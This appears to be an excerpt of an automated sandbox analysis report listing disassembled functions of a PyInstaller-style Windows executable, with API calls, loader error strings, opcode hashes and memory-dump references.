                                                              • Instruction ID: a5cc9f9caf7229d9bfa772b03514d7b885c6cdd0412d44df934a638a44587731
                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                              • Instruction Fuzzy Hash: 8FF0C822A1874186FBA08F60B89A7667360AB84764F044379D96E576D4DF3CD148CB01
                                                              Function 00007FF623F71950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F77F90: _fread_nolock.LIBCMT ref: 00007FF623F7803A
                                                              • _fread_nolock.LIBCMT ref: 00007FF623F71A1B
                                                                • Part of subcall function 00007FF623F72910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF623F71B6A), ref: 00007FF623F7295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _fread_nolock$CurrentProcess
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 2397952137-3497178890
                                                              • Opcode ID: 0f483c96fe4a4c69c90a39afd4e5d268cd6ae7994ed35f6fde7e21f5879fc203
                                                              • Instruction ID: ddfed926d79b539a095e24ee899c3fd563e6e6b1f54bb10d65a3fae352ffc253
                                                              • Opcode Fuzzy Hash: 0f483c96fe4a4c69c90a39afd4e5d268cd6ae7994ed35f6fde7e21f5879fc203
                                                              • Instruction Fuzzy Hash: 8B818071A0868285EF609F14F8466F923A0EF48784F4485B5D98DEB789DF3CE74A8742
                                                              Function 00007FF623F71600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2050909247-1550345328
                                                              • Opcode ID: d7a2ec889dda4660d725dbde8a6a1af137cbd017c3a683569ae9da45010acb6c
                                                              • Instruction ID: ca4af423212090532dc370921ed3d90e48efc542040214ae54fae4ac991ff141
                                                              • Opcode Fuzzy Hash: d7a2ec889dda4660d725dbde8a6a1af137cbd017c3a683569ae9da45010acb6c
                                                              • Instruction Fuzzy Hash: D0519121B0864392EE149F12BD421B963A0BF84794F9445B5ED0CAB7D6DF3CEB4AC702
                                                              Function 00007FF623F78660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF623F73CBB), ref: 00007FF623F78704
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF623F73CBB), ref: 00007FF623F7870A
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF623F73CBB), ref: 00007FF623F7874C
                                                                • Part of subcall function 00007FF623F78830: GetEnvironmentVariableW.KERNEL32(00007FF623F7388E), ref: 00007FF623F78867
                                                                • Part of subcall function 00007FF623F78830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF623F78889
                                                                • Part of subcall function 00007FF623F88238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF623F88251
                                                                • Part of subcall function 00007FF623F72810: MessageBoxW.USER32 ref: 00007FF623F728EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 3563477958-1339014028
                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                              • Instruction ID: 08435ed828119a6062aa203aad2da6aaa219b586a7ee88bafc29a2a5c142ab52
                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                              • Instruction Fuzzy Hash: E8419221B1964244FE24AB66BD572F91251AF847C0F4441B6ED0DEB7EAEF3CE7058302
                                                              Function 00007FF623F71210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2050909247-2813020118
                                                              • Opcode ID: 2ebd5cd2a1f27b6cef0b3059843049f42224154139c639c484b91497eb3c0144
                                                              • Instruction ID: 5b774e1941a2f323e2dbd92c08cff17772c76c3ce4ad0db418442a615fd62f36
                                                              • Opcode Fuzzy Hash: 2ebd5cd2a1f27b6cef0b3059843049f42224154139c639c484b91497eb3c0144
                                                              • Instruction Fuzzy Hash: E051E922A0864245EE649F12FC423BA6291FF85B94F444175ED4DEB7D9EF3CE60AC702
                                                              Function 00007FF623F8ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF623F8F0AA,?,?,-00000018,00007FF623F8AD53,?,?,?,00007FF623F8AC4A,?,?,?,00007FF623F85F3E), ref: 00007FF623F8EE8C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF623F8F0AA,?,?,-00000018,00007FF623F8AD53,?,?,?,00007FF623F8AC4A,?,?,?,00007FF623F85F3E), ref: 00007FF623F8EE98
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                              • Instruction ID: 469b06cd1df4b8ad1ce3252a2bb90352e068ca745cfb10fb75ea28ed6002bf38
                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                              • Instruction Fuzzy Hash: DE41F421B19A1241EE19CB17BC025752291BF58FD0F8A8179DD1DE7794FF3CEA498302
                                                              Function 00007FF623F736B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF623F73804), ref: 00007FF623F736E1
                                                              • GetLastError.KERNEL32(?,00007FF623F73804), ref: 00007FF623F736EB
                                                                • Part of subcall function 00007FF623F72C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72C9E
                                                                • Part of subcall function 00007FF623F72C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF623F73706,?,00007FF623F73804), ref: 00007FF623F72D63
                                                                • Part of subcall function 00007FF623F72C50: MessageBoxW.USER32 ref: 00007FF623F72D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 3187769757-2863816727
                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                              • Instruction ID: 7785ab69f8acfd8061b58c875a41ae4f4a4e896ae795533db508863402dbc0bf
                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                              • Instruction Fuzzy Hash: FC219161B1C64291FE209B24FC527F62260BF88394F804176D95DEB5E5EF2CE705C742
                                                              Function 00007FF623F8BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                              • Instruction ID: d7c8534323d39f3c039a652470f4d0aff8da1c38563d477d92b3bf82e2e898ce
                                                              • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                              • Instruction Fuzzy Hash: 2FC1E522A0C78691EF689B16B8422BD7B90FF81BC0F554171EA4DA7391CF7CEE458702
                                                              Function 00007FF623F78570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                              • Instruction ID: d15c945f620d9d08e8d175238d10b5cfb5f45fb4a9107967f80cbf4a118fe6be
                                                              • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                              • Instruction Fuzzy Hash: 20216031A0C64642EF208F55BD4623AA3A0FF857E0F504275EA6D97BE8DF7CDA458B01
                                                              Function 00007FF623F790E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F78570: GetCurrentProcess.KERNEL32 ref: 00007FF623F78590
                                                                • Part of subcall function 00007FF623F78570: OpenProcessToken.ADVAPI32 ref: 00007FF623F785A3
                                                                • Part of subcall function 00007FF623F78570: GetTokenInformation.KERNELBASE ref: 00007FF623F785C8
                                                                • Part of subcall function 00007FF623F78570: GetLastError.KERNEL32 ref: 00007FF623F785D2
                                                                • Part of subcall function 00007FF623F78570: GetTokenInformation.KERNELBASE ref: 00007FF623F78612
                                                                • Part of subcall function 00007FF623F78570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF623F7862E
                                                                • Part of subcall function 00007FF623F78570: CloseHandle.KERNEL32 ref: 00007FF623F78646
                                                              • LocalFree.KERNEL32(?,00007FF623F73C55), ref: 00007FF623F7916C
                                                              • LocalFree.KERNEL32(?,00007FF623F73C55), ref: 00007FF623F79175
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                              • Instruction ID: 1a3cbe0d82a5fa058f9544afe8b94bd22cda0c85fabc9548ec5981d8a3131eed
                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                              • Instruction Fuzzy Hash: 29215E21A0874281FE10AF10FD162FA6261FF88780F5440B6EA4DA7796DF3CEA45C742
                                                              Function 00007FF623F8CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF623F8CF4B), ref: 00007FF623F8D07C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF623F8CF4B), ref: 00007FF623F8D107
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                              • Instruction ID: 3f28fdcec8c30cd6d056f420eea1b65b8bf0c9dd5af5f16432851651c741ea95
                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                              • Instruction Fuzzy Hash: 9191C623E1865185FF689F66AC4227D2BA1AF44BC8F144176EE0EB7694CF38D642C702
                                                              Function 00007FF623F85628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                              • Instruction ID: ad901913d66f207543b61d91d93c870ef32fb8529524f6c9749fc9b6f04c8aed
                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                              • Instruction Fuzzy Hash: 18419422E1878183EB588F22A9113797261FB947E4F109375EA5C53AD1DF7CA6E48701
                                                              Function 00007FF623F7CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                              • Instruction ID: 9c21fc3b7fd5476a8edd4a8fa1ea808824f1fafe24cb91e42e886073ce0602e3
                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                              • Instruction Fuzzy Hash: 77313921E0814781FE24AB65BC273B91691AF45784F4450B5EA0EEF2E7DF6CAB05C213
                                                              Function 00007FF623F89A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                              • Instruction ID: b94f18f7505da65dc46fef8ef228cc52f20f6fcfc464e0f62ae90b8bb069b33c
                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                              • Instruction Fuzzy Hash: 88D06710B0870642EE1C6F717C5A0B912656F49B41B1454B8CC1BA7393DF6DAA494202
                                                              Function 00007FF623F8013C Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                              • Instruction ID: e57a770f3994da9b119c3882984fd6e54b893dd56ded3e30b899fd319a64b737
                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                              • Instruction Fuzzy Hash: BF51E321B0964296EF2C9E27AC0267A6291BF44BF4F584774DD6DA3BD5CF3CE6008602
                                                              Function 00007FF623F8AB58 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF623F8A9D5,?,?,00000000,00007FF623F8AA8A), ref: 00007FF623F8ABC6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F8A9D5,?,?,00000000,00007FF623F8AA8A), ref: 00007FF623F8ABD0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                              • Instruction ID: c6ceb564318bcc735b17da4dfd8cbefd82b2f5b56ec9ad245d1f2fa7ea2a39fb
                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                              • Instruction Fuzzy Hash: D321C611B2C78241FE989756BC9237D2692DF847D0F0842B9DA2EE77D1DF6CEA418302
                                                              Function 00007FF623F8C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2000514406.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000000.00000002.2000482206.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000679616.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000743459.00007FF623FB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2000831966.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                              • Instruction ID: 9336dbdd9d0fdf810defdc196a6a3a072cbdbd72adc241d6e86b0827c276ffb5
                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                              • Instruction Fuzzy Hash: FE110162718A8181DE248B26BC45169B361AB85FF4F544371EEBD9BBE9CF3CD2108701
                                                              Function 00007FF623F8A948 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF623F92D22,?,?,?,00007FF623F92D5F,?,?,00000000,00007FF623F93225,?,?,?,00007FF623F93157), ref: 00007FF623F8A95E
